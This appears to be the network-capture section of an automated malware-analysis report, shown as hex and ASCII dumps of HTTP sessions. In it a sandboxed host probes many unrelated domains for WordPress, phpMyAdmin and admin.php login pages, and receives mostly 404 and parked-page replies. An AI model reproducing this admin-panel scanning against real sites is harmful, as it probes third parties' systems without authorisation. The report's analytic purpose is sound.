                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.718075991 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.723598957 CET266OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://eremina.net/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.943520069 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.943545103 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                139192.168.2.65689481.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.598270893 CET231OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:30.792448997 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                140192.168.2.65730869.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.630615950 CET224OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.802536964 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                141192.168.2.6573983.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.630743027 CET228OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.739567995 CET889INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_d/+XWPom+g8Mg3GUvvtmoNes2SDO2jlN1dPakQO9fvTb6+Xjg+KG5DTnhI/hFIH6zqhykU4g5geiNVEJrWwoew
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                142192.168.2.65739566.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.630943060 CET234OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.744209051 CET1188INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Expires: Sat, 02 Dec 2023 01:09:39 GMT
                                                                                                                                                                                                                                                                                                                Age: 2
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                143192.168.2.65732781.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
